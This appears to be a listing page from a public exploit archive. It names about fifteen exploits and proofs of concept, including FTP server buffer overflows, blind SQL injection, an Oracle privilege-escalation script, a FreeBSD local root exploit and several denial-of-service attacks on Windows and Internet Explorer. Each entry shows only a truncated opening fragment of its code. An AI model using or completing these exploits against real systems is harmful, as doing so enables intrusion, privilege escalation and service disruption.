WarFTP 1.65 (USER) Remote Buffer Overflow Exploit
#include <stdio.h> #include <string.h> #include <winsock.h> #define VULNSERVER "WAR-FTPD 1.65" #define VULNCMD "\x55\x53\x45\x52\x20" #define ZERO '\x00' #d

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " n"; print " #################### Viva IslaMe Viva IslaMe #############

WFTPD Pro Server
/************************************************************************ *WFTPD server <= 3.25 SITE ADMN DoS * * * *Sending comm

MS Windows (MessageBox) Memory Corruption Local Denial of Service
// mbox.cs using System; using System.Runtime.InteropServices; class HelloWorldFromMicrosoft { [DllImport("user32.dll")] unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uTyp

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
<!-- ----------------------------------------------------------------------------------------------------------- BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service author: shinnai mail: shinnai[at]autistici[dot]o

Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC ###### Author ###### LifeAsaGeek at gmail.com ... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs ######################## Vul

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
#!/usr/bin/python # MS Windows DCE-RPC svcctl ChangeServiceConfig2A() 0day Memory Corruption PoC Exploit # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Tested on Windows 2000 SP4 Polish (all patches) # # Re

MS Internet Explorer (FTP Server Response) DoS Exploit
#!/usr/bin/perl # MS 07-016 FTP Server Response PoC # Usage: ./ms07016ftp.pl [LISTEN_IP] # # Tested Against: MSIE 6.02900.2180 (SP2) # # Details: The response is broken into buffers, either at length 1024, #

Linux Kernel
/* Linux Kernel DCCP Memory Disclosure Vulnerability Synopsis: The Linux kernel is susceptible to a locally exploitable flaw which may allow local users to steal data from the kernel memory. Vulnerable Systems: Linux Kernel Versio

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
#!/usr/bin/python # Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability # was discovered by h07 and a POC for windows XP SP2 (polish version) was # provided. This exploit was tested on windows 2000 server SP4. The expl

MS Internet Explorer Recordset Double Free Memory Exploit
<HTML> <!-- ********************************************************************************** Microsoft Internet Explorer ADODB.Recordset Double Free Memory Exploit (ms07-009). ***********************************************

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the co

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit
#!/usr/bin/perl # # Remote Oracle KUPM$MCP.MAIN exploit (10g) # # Grant or revoke dba permission to unprivileged user # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # # REF: http://www

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin (you 31337!!! ;)) // thanks to sacrine and all the other netric guys!!! you rule :) #include <stdio.h> #include <stdlib.h>

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
<?php //////////////////////////////////////////////////////////////////////// // _ _ _ _ ___ _ _ ___ // // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //